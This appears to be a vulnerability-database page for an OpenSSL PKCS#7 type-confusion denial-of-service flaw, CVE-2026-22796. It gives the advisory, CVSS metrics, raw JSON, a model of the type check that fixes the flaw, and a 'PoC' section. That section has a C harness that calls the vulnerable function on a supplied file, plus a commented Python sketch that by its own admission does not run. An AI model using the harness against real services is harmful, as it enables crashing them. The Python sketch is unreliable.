Security Vulnerability Report
CVE-2026-22796 CVSS 5.3 MEDIUM

CVE-2026-22796

Published: 2026-01-27 16:16:36
Last Modified: 2026-05-12 13:17:32

Description

Issue summary: A type confusion vulnerability exists in the signature verification of signed PKCS#7 data where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing malformed PKCS#7 data.

Impact summary: An application performing signature verification of PKCS#7 data or calling directly the PKCS7_digest_from_attributes() function can be caused to dereference an invalid or NULL pointer when reading, resulting in a Denial of Service.

The function PKCS7_digest_from_attributes() accesses the message digest attribute value without validating its type. When the type is not V_ASN1_OCTET_STRING, this results in accessing invalid memory through the ASN1_TYPE union, causing a crash.

Exploiting this vulnerability requires an attacker to provide a malformed signed PKCS#7 to an application that verifies it. The impact of the exploit is just a Denial of Service, the PKCS7 API is legacy and applications should be using the CMS API instead. For these reasons the issue was assessed as Low severity.

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#7 parsing implementation is outside the OpenSSL FIPS module boundary.

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
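The missing check described above, shown as an added example on a simplified model of a tagged union. This is not OpenSSL source and not the upstream fix; the type names, the TAG_* constants and the functions digest_from_attr(), check_digest() and demo_case() are assumptions made for illustration, and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Model constants (assumed names) using the universal ASN.1 tag numbers. */
enum { TAG_BOOLEAN = 1, TAG_OCTET_STRING = 4, TAG_NULL = 5 };

typedef struct { int length; const unsigned char *data; } octet_string_t;

/* Tagged union: `type` alone decides which member of `value` is valid. */
typedef struct {
    int type;
    union {
        int boolean;                        /* valid for TAG_BOOLEAN */
        const octet_string_t *octet_string; /* valid for TAG_OCTET_STRING */
        void *ptr;                          /* NULL for TAG_NULL */
    } value;
} any_value_t;

/* Hardened accessor: checks the tag before touching the union member. */
static const octet_string_t *digest_from_attr(const any_value_t *av)
{
    if (av == NULL || av->type != TAG_OCTET_STRING)
        return NULL;            /* wrong type: never read octet_string */
    if (av->value.octet_string == NULL || av->value.octet_string->length < 0)
        return NULL;
    return av->value.octet_string;
}

/* Returns 1 on match, 0 on mismatch, -1 when the attribute is malformed. */
static int check_digest(const any_value_t *av, const unsigned char *md, int n)
{
    const octet_string_t *os = digest_from_attr(av);
    if (os == NULL) return -1;
    if (os->length != n) return 0;
    return memcmp(os->data, md, (size_t)n) == 0;
}

/* Constructed inputs: 0 = well-formed, 1 = BOOLEAN value, 2 = NULL value. */
int demo_case(int kind)
{
    static const unsigned char md[4] = { 0xde, 0xad, 0xbe, 0xef };
    static const octet_string_t os = { 4, md };
    any_value_t av;
    memset(&av, 0, sizeof av);
    if (kind == 0) { av.type = TAG_OCTET_STRING; av.value.octet_string = &os; }
    else if (kind == 1) { av.type = TAG_BOOLEAN; av.value.boolean = 0xff; }
    else { av.type = TAG_NULL; av.value.ptr = NULL; }
    return check_digest(&av, md, 4);
}

int main(void)
{
    for (int k = 0; k < 3; k++) printf("case %d -> %d\n", k, demo_case(k));
    return 0;
}
```

Without the tag comparison in digest_from_attr(), case 1 would interpret the stored boolean as a pointer and case 2 would dereference NULL, which are the two failure modes the description names.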

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* - VULNERABLE
OpenSSL 3.6.x
OpenSSL 3.5.x
OpenSSL 3.4.x
OpenSSL 3.3.x
OpenSSL 3.0.x
OpenSSL 1.1.1.x
OpenSSL 1.0.2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-22796 PoC - Malformed PKCS#7 Type Confusion
 * This PoC demonstrates the type confusion in PKCS7_digest_from_attributes()
 * Compile: gcc -o cve_poc cve_poc.c -lssl -lcrypto
 * Usage: ./cve_poc <malformed_pkcs7_file>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pem.h>
#include <openssl/pkcs7.h>
#include <openssl/err.h>

int main(int argc, char **argv)
{
    FILE *fp;
    PKCS7 *p7 = NULL;
    PKCS7_SIGNER_INFO *si;
    STACK_OF(PKCS7_SIGNER_INFO) *sk_si;
    int i;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s <malformed_pkcs7_file>\n", argv[0]);
        return 1;
    }

    /* Read malformed PKCS#7 data from file */
    fp = fopen(argv[1], "rb");
    if (!fp) {
        perror("Failed to open file");
        return 1;
    }

    /* Parse PKCS#7 structure (DER encoded) */
    p7 = d2i_PKCS7_fp(fp, NULL);
    fclose(fp);
    if (!p7) {
        fprintf(stderr, "Failed to parse PKCS#7 data\n");
        ERR_print_errors_fp(stderr);
        return 1;
    }

    /* Get signer info - this triggers the vulnerable code path */
    sk_si = PKCS7_get_signer_info(p7);
    if (sk_si && sk_PKCS7_SIGNER_INFO_num(sk_si) > 0) {
        for (i = 0; i < sk_PKCS7_SIGNER_INFO_num(sk_si); i++) {
            si = sk_PKCS7_SIGNER_INFO_value(sk_si, i);
            /*
             * This call triggers the vulnerability:
             * PKCS7_digest_from_attributes() accesses ASN1_TYPE
             * without validating the type first
             */
            PKCS7_digest_from_attributes(si->auth_attr);
        }
    }

    PKCS7_free(p7);
    printf("No crash detected - target may not be vulnerable\n");
    return 0;
}

/* Alternative Python PoC using cryptography library */
/*
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import pkcs7
import sys

def trigger_vulnerability():
    # Read malformed PKCS#7 data
    with open(sys.argv[1], 'rb') as f:
        malformed_data = f.read()

    # Attempt to parse - this may trigger the vulnerability
    # PKCS7SignatureBuilder builds signatures and has no from_der() method,
    # so this sketch raises AttributeError as written.
    try:
        p7 = pkcs7.PKCS7SignatureBuilder.from_der(malformed_data)
        # Access signer info which calls vulnerable function
        p7.sign(hashes.SHA256(), options=[])
    except Exception as e:
        print(f"Error: {e}")

if __name__ == '__main__':
    trigger_vulnerability()
*/

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22796", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:35.543", "lastModified": "2026-05-12T13:17:32.480", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: A type confusion vulnerability exists in the signature\nverification of signed PKCS#7 data where an ASN1_TYPE union member is\naccessed without first validating the type, causing an invalid or NULL\npointer dereference when processing malformed PKCS#7 data.\n\nImpact summary: An application performing signature verification of PKCS#7\ndata or calling directly the PKCS7_digest_from_attributes() function can be\ncaused to dereference an invalid or NULL pointer when reading, resulting in\na Denial of Service.\n\nThe function PKCS7_digest_from_attributes() accesses the message digest attribute\nvalue without validating its type. When the type is not V_ASN1_OCTET_STRING,\nthis results in accessing invalid memory through the ASN1_TYPE union, causing\na crash.\n\nExploiting this vulnerability requires an attacker to provide a malformed\nsigned PKCS#7 to an application that verifies it. The impact of the\nexploit is just a Denial of Service, the PKCS7 API is legacy and applications\nshould be using the CMS API instead. 
For these reasons the issue was\nassessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#7 parsing implementation is outside the OpenSSL FIPS module\nboundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue."}, {"lang": "es", "value": "Resumen del problema: Existe una vulnerabilidad de confusión de tipos en la verificación de firma de datos PKCS#7 firmados, donde se accede a un miembro de la unión ASN1_TYPE sin validar primero el tipo, causando una desreferencia de puntero inválido o NULL al procesar datos PKCS#7 malformados.\n\nResumen del impacto: Una aplicación que realiza la verificación de firma de datos PKCS#7 o que llama directamente a la función PKCS7_digest_from_attributes() puede ser inducida a desreferenciar un puntero inválido o NULL al leer, resultando en una denegación de servicio.\n\nLa función PKCS7_digest_from_attributes() accede al valor del atributo de resumen del mensaje sin validar su tipo. Cuando el tipo no es V_ASN1_OCTET_STRING, esto resulta en el acceso a memoria inválida a través de la unión ASN1_TYPE, causando un fallo.\n\nExplotar esta vulnerabilidad requiere que un atacante proporcione un PKCS#7 firmado malformado a una aplicación que lo verifica. El impacto del exploit es solo una denegación de servicio, la API PKCS7 es heredada y las aplicaciones deberían usar la API CMS en su lugar. 
Por estas razones, el problema fue evaluado como de baja severidad.\n\nLos módulos FIPS en 3.5, 3.4, 3.3 y 3.0 no se ven afectados por este problema, ya que la implementación de análisis de PKCS#7 está fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 y 1.0.2 son vulnerables a este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.2", "versionEndExcluding": "1.0.2zn", "matchCriteriaId": "6A8EC60C-05EC-4886-8C82-63AEF4BDA8D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.1", "versionEndExcluding": "1.1.1ze", "matchCriteriaId": "E000B986-6A31-468F-9EA3-B9D16DB16FB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.19", "matchCriteriaId": "C76C5F55-5243-4461-82F5-2FEBFF4D59FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "F5292E9E-6B50-409F-9219-7B0A04047AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", 
"versionEndExcluding": "3.4.4", "matchCriteriaId": "B9D3DCAE-317D-4DFB-93F0-7A235A229619"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0C ... (truncated)